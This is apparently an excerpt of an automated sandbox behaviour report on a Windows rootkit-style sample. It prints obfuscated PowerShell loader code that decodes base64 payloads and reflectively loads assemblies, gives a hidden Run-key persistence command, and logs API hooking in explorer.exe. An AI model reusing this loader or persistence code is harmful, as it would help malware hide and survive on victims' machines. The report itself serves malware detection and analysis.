'$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx,20_2_000001B444901E3C
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000001B4448BA7DD push rcx; retf 003Fh20_3_000001B4448BA7DE
Source: C:\Windows\System32\conhost.exeCode function: 39_3_000001FE3A95A7DD push rcx; retf 003Fh39_3_000001FE3A95A7DE
Source: C:\Windows\System32\dllhost.exeCode function: 40_3_000001C03F6FA7DD push rcx; retf 003Fh40_3_000001C03F6FA7DE
Source: C:\Windows\System32\winlogon.exeCode function: 41_3_000002E99173A7DD push rcx; retf 003Fh41_3_000002E99173A7DE
Source: C:\Windows\System32\lsass.exeCode function: 42_3_00000213BDCCA7DD push rcx; retf 003Fh42_3_00000213BDCCA7DE
Source: C:\Windows\System32\svchost.exeCode function: 43_3_00000158709BA7DD push rcx; retf 003Fh43_3_00000158709BA7DE
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB164A7DD push rcx; retf 003Fh44_3_0000026DB164A7DE
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB161A7DD push rcx; retf 003Fh44_3_0000026DB161A7DE
Source: C:\Windows\System32\svchost.exeCode function: 45_3_000002A3EFFDA7DD push rcx; retf 003Fh45_3_000002A3EFFDA7DE

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
